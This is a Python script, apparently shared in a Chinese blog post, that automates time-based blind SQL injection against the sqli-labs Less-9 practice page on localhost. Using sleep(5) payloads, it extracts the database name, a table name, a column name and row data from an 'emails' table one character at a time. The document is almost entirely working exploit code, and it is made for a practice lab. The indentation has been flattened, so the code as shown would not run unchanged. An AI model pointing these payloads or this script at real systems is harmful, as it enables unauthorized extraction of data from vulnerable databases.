import requests
import time
dic="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-=_+1234567890"
url="http://127.0.0.1/sqli-labs-master/Less-9/"
close="?id=1'"
database=""
length=1
payload1="and if(length(database())=%s,sleep(5),null)--+"
payload2='and if(substr(database() ,%s,1)="%s",sleep(5),null)--+'
print("开始爆破数据库长度")
while length>0:
print("正在尝试%d位"%length)
payload=payload1%(str(length))
start=time.time()
a=requests.request('get',url+close+payload)
finish=time.time()
long=finish-start
if long>=4:
break
length=length+1
print("成功:数据库长度为%d"%length)
print("开始爆破数据库名")
i=1
while i<=length:
q=1
print("正在尝试%d位"%i,end=" ")
while q<=(len(dic)-1):
payload=payload2%(i,dic[q-1])
start=time.time()
a=requests.request('get',url+close+payload)
finish=time.time()
long=finish-start
if long>=4:
database=database+dic[q-1]
print("成功:结果为%s"%dic[q-1])
break
q=q+1
i=i+1
print("数据库爆破完成,名为:%s"%database)
print("开始爆破表长度")
table_name=""
length=1
payload1='and if(length((select table_name from information_schema.tables where table_schema="%s"limit 0,1))=%s,sleep(5),null)--+'
payload2='and if(substr((select table_name from information_schema.tables where table_schema="%s"limit 0,1),%s,1)="%s",sleep(5),null)--+'
while length>0:
print("正在尝试%d位"%length)
payload=payload1%(database,length)
start=time.time()
a=requests.request('get',url+close+payload)
finish=time.time()
long=finish-start
if long>=4:
break
length=length+1
print("成功:表长度为%d"%length)
print("开始爆破表名")
i=1
while i<=length:
q=1
print("正在尝试%d位"%i,end=" ")
while q<=(len(str(dic))-1):
payload=payload2%(database,i,dic[q-1])
start=time.time()
a=requests.request('get',url+close+payload)
finish=time.time()
long=finish-start
if long>=4:
table_name=table_name+dic[q-1]
print("成功:结果为%s"%dic[q-1])
break
q=q+1
i=i+1
print("表名爆破完成,结果为:%s"%table_name)
print("开始爆破字段名长度")
length=1
payload1='and if(length((select column_name from information_schema.columns where table_name="%s"limit 1,1))=%s,sleep(5),null)--+'
payload2='and if(substr((select column_name from information_schema.columns where table_name="%s"limit 1,1),%s,1)="%s",sleep(5),null)--+'
while length>0:
print("正在尝试%d位"%length)
payload=payload1%(table_name,length)
start=time.time()
a=requests.request('get',url+close+payload)
finish=time.time()
long=finish-start
if long>=4:
break
length=length+1
print("成功:字段名长度为%d"%length)
print("开始爆破字段名")
i=1
column_name=""
while i<=length:
q=1
print("正在尝试第%d位"%i,end=" ")
while q<=(len(dic)-1):
payload=payload2%(table_name,i,dic[q-1])
start=time.time()
a=requests.request('get',url+close+payload)
finish=time.time()
long=finish-start
if long>=4:
column_name=column_name+dic[q-1]
print("成功:结果为%s"%dic[q-1])
break
q=q+1
i=i+1
print("字段名爆破完成,结果为:%s"%column_name)
print("开始爆破数据长度")
length=1
payload1='and if(length((select %s from emails limit 0,1))=%s,sleep(5),null)--+'
payload2='and if(substr((select %s from emails limit 0,1),%s,1)="%s",sleep(5),null)--+'
while length>0:
print("正在尝试%d位"%length)
payload=payload1%(column_name,length)
start=time.time()
a=requests.request('get',url+close+payload)
finish=time.time()
long=finish-start
if long>=4:
break
length=length+1
print("成功:数据长度为%d"%length)
print("开始爆破数据")
i=1
data=""
while i<=length:
q=1
print("正在尝试%d位"%i,end=" ")
while q<=(len(dic)-1):
payload=payload2%(column_name,i,dic[q-1])
start=time.time()
a=requests.request('get',url+close+payload)
finish=time.time()
long=finish-start
if long>=4:
data=data+dic[q-1]
print("成功:结果为%s"%dic[q-1])
break
q=q+1
i=i+1
print("数据爆破完成,结果为%s"%data)贴一篇自己写的时间盲注脚本
发布于 2022-07-22 470 次阅读